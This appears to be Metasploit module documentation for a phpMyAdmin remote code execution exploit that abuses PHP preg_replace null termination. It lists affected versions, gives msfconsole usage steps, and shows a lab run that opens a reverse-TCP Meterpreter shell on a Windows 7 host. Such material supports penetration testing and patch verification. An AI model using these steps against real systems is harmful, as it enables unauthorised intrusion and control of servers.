h00die
1.7 KiB
1.7 KiB
Description
This module exploits a vulnerability in a PHP's preg_replace() function
that is used by phpMyAdmin's replace table feature.
Vulnerable Application
PHP versions before 5.4.6 allow null termination of the preg_replace string parameter.
phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7), and 4.0.x versions (prior to 4.0.10.16) are affected.
Options
DATABASE
This option specifies the database the module will use when creating a new table as part of the exploit.
Verification Steps
- Install vulnerable phpMyAdmin application
- Create database through phpMyAdmin application
./msfconsoleuse exploit/multi/http/phpmyadmin_null_termination_execset USERNAME <username>set PASSWORD <password>set DATABASE <database>set rhost <rhost>run
Scenarios
Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8
msf > use exploit/multi/http/phpmyadmin_null_termination_exec
msf exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
database => <database>
msf exploit(multi/http/phpmyadmin_null_termination_exec) > run
[*] Started reverse TCP handler on 172.22.222.177:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'
meterpreter > sysinfo
Computer : WIN-V438RLMESAE
OS : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows